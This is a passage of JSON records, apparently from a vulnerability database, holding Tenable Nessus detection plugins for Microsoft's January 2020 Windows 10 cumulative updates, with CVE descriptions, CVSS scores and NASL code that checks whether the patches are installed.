data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. 
An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534306/windows-10-update-kb4534306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fd98f0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534306.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534306');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534306])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T22:48:27", "description": "The remote Windows host is missing security update 
4528760.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the Windows Subsystem for Linux handles files.\n An attacker who successfully exploited the vulnerability could execute code with elevated privileges.\n (CVE-2020-0636)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0624, CVE-2020-0642)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - A denial of service vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. 
An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0644)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4528760: Windows 10 Version 1903 and Windows 10 Version 1909 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0616", "CVE-2020-0620", "CVE-2020-0623", "CVE-2020-0624", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0636", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4528760.NASL", "href": "https://www.tenable.com/plugins/nessus/132857", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132857);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0616\",\n \"CVE-2020-0620\",\n \"CVE-2020-0623\",\n \"CVE-2020-0624\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0636\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4528760\");\n script_xref(name:\"MSFT\", value:\"MS20-4528760\");\n\n script_name(english:\"KB4528760: Windows 10 Version 1903 and Windows 10 Version 1909 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4528760.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Subsystem for Linux handles files.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated privileges.\n (CVE-2020-0636)\n\n - 
An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0624, CVE-2020-0642)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. 
A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. 
An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-0644)\");\n # https://support.microsoft.com/en-us/help/4528760/windows-10-update-kb4528760\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?027d37ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4528760.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4528760');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4528760])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4528760])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T22:48:43", "description": "The remote Windows host is missing security update 4534276.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise 
the user's system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in Windows 10 when third party filters are called during a password update. Successful exploitation of the vulnerability could allow a user to make use of a blocked password for their account. 
(CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. 
An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 
(CVE-2020-0601)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534276: Windows 10 Version 1709 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534276.NASL", "href": "https://www.tenable.com/plugins/nessus/132860", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132860);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4534276\");\n script_xref(name:\"MSFT\", value:\"MS20-4534276\");\n\n script_name(english:\"KB4534276: Windows 10 Version 1709 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534276.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts 